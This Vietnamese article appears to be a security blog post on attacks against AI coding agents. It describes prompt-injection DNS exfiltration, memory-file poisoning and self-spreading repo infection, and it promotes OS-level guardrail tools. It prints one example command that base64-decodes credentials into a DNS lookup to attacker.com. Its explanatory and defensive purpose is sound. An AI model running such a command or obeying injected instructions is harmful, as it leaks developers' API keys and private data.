Bề Mặt Tấn Công Vô Hình Của AI Coding Agent
AI coding agent của bạn có quyền truy cập filesystem, network, và kiểm soát subprocess. Hầu hết developer đều biết điều này. Nhưng ít người nhận ra rằng họ gần như không có khả năng nhìn thấy agent thực sự làm gì — và cách những kẻ tấn công đang khai thác khe hở đó một cách sáng tạo.
Ba attack pattern đã được ghi nhận cho thấy một vấn đề mang tính hệ thống.
CVE-2025-55284: Đánh Cắp Dữ Liệu qua DNS Exfiltration
Một prompt injection attack có thể lừa Claude Code chạy:
ping $(base64 -d <<< <mã-hóa-credentials>).attacker.comLệnh này gửi API key của bạn ra ngoài qua DNS — hoàn toàn không thể thấy bởi bất kỳ HTTPS-layer proxy nào. Network monitoring của bạn không phát hiện gì vì DNS queries không phải HTTPS. Tấn công này không đụng đến API layer — nó khai thác khả năng thực thi tool ở cấp độ OS của agent.
SpAIware: Đầu Độc Memory Files Của AI
Một prompt độc hại có thể inject nội dung vào memory files của AI agent (ví dụ: ~/.claude/memory.json). Mọi phiên làm việc sau đó âm thầm exfiltrate dữ liệu trước khi làm bất cứ điều gì. Điểm inject là một file local, không phải network request. Không có proxy nào bắt được điều này.
AgentHopper: Kẻ Lây Nhiễm Repo Thầm Lặng
Một AI agent đọc một repository độc hại, inject payloads vào source files local, rồi git-push. Developer tiếp theo clone về và AI agent của họ bị lây nhiễm. Không sự kiện đơn lẻ nào trông đáng ngờ:
Chỉ có cross-event correlation mới phát hiện được pattern này. Hầu hết tools hiện tại không có khả năng này.
Tại Sao Network Proxies Không Giải Quyết Được
Mọi tool bảo mật hiện có — CodeGate, Pipelock, sản phẩm agent security của Sysdig — đều đứng ở network path và inspect các API calls. Kiến trúc này không thể thấy được file reads, subprocess spawning, hay DNS exfiltration. Nó không thể giám sát những gì AI viết vào memory directories của chính nó.
Bề mặt tấn công không nằm ở API layer. Nó nằm ở OS.
Giải Pháp Mới Nổi: OS-Level Guardrails
Một danh mục tool mới đang hình thành để giải quyết đúng khoảng trống này. Vectimus sử dụng ngôn ngữ policy Cedar của AWS để intercept mọi tool call — shell commands, file reads/writes, MCP calls, git pushes — trước khi thực thi. Policies được evaluate local trong dưới 10ms với zero network calls. Mọi quyết định tạo ra một Ed25519-signed receipt để audit.
Agent Shield (macOS) giám sát AI coding tools ở cấp FSEvents, theo dõi subprocess trees và network activity, với SpAIware detection trên AI memory directories.
Điểm thay đổi kiến trúc quan trọng: chuyển từ network-layer inspection sang OS-layer interception. Bạn không thể inspect cách thoát khỏi một filesystem problem.
Threat Từ MCP Server
CVE-2025-6514 đã compromise 437.000+ môi trường development qua một malicious MCP OAuth proxy. GitHub MCP server bị hijack qua một crafted GitHub issue để exfiltrate private repo data. Với tools như Vectimus, MCP servers có thể bị block by default và allowlisted per-project với input inspection — trước khi một compromised server có cơ hội thực thi.
Dành Cho Technical Founders và Builders
Nếu bạn đang ship AI-assisted tools hoặc dùng agents trong stack, hãy hỏi nhà cung cấp security tooling:
- Bạn có thể thấy file reads, không chỉ API calls?
- Bạn có giám sát những gì agent viết vào memory directories của nó?
- Bạn có phát hiện cross-event sequences (read → write → network → push)?
- Bạn có signed receipts cho mọi tool call decision?